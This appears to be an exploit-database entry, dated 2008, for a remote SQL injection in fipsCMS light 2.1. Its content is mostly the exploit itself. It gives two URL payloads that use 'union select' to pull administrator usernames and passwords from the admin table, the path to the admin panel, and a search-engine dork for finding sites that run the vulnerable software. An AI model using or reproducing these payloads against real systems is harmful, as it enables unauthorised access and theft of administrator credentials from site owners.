id: 3450
date: 07/25/2008
title: fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability
author: U238
cves: 

===========================================================
fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability
===========================================================



Exploit Code:

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin

http://localhost:2222/lab/cms/_admin

Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5
Found By U238
# Exploit Search Find: ^o)
#
# fipsCMS light - A© fipsASP 2003 - 2008. All rights reserved
#
# fipsCMS light - A© fipsASP 2003 - 2008
#
# inurl:"fipsASP 2003 - 2008"
# ************************************************ 



#  0day.today [2023-03-22]  #